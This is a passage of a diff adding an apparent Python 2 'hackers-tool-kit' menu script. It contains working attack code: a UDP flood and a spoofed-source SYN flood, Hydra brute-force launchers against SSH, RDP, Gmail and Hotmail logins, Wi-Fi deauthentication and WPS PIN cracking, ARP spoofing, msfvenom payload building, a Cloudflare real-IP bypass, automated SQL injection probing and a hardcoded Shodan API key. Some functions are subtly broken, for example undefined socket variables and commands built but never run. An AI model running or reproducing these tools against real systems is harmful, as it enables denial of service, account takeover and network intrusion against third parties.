urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + 